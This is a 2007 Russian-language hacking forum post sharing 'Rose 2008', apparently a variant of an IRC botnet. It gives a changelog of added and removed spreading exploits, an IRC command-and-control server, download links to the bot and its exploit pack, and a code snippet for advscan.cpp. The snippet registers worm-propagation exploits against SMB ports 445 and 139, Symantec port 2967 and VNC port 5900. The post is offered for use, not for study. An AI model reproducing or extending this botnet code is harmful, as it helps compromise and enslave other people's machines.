Показать сообщение отдельно

  #4  
Старый 05.08.2007, 14:38
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

[b]Kaiten.c.Bot[b/]
Цитата:
/*
#############################################
# #
# Rose 2008 QuickFix. #
# So Far: #
# Removed SYN #
# Removed DCOM #
# Removed LSASS #
# Added VNC #
# Added SCANALL #
# Added SYM #
# Removed TASKHIDER #
# WORK IN PROGRESS... #
# IRC.BLUEHELL.ORG - IRC.BLUEHELL.ORG #
# #x0 #x0 #x0 #x0 #x0 #x0 #x0 #x0 #x0 #
# #
#############################################
http://rapidshare.com/files/20556964/Rose_2008.rar

Add this to advscan.cpp

Код:
 #ifndef NO_MS04007ASN1
    { "asn1smb",    "asn1smb", 445, MS04_007_MSASN1_PortedByScriptGod, 0, FALSE, TRUE },
    { "asn1smbnt",  "asn1smbnt",139, MS04_007_MSASN1_PortedByScriptGod, 0, FALSE, TRUE },
    #endif
   #ifndef NO_SYM06010
   {"sym", "sym", 2967, SYMExploit, 0, TRUE, TRUE},
   #endif
   #ifndef NO_VNC
    {"vnc", "vnc", 5900, VNCExploit, 0, FALSE, FALSE},
    #endif
http://rapidshare.com/files/19840994/Rose_2008_Exploits.rar.html
 
Ответить с цитированием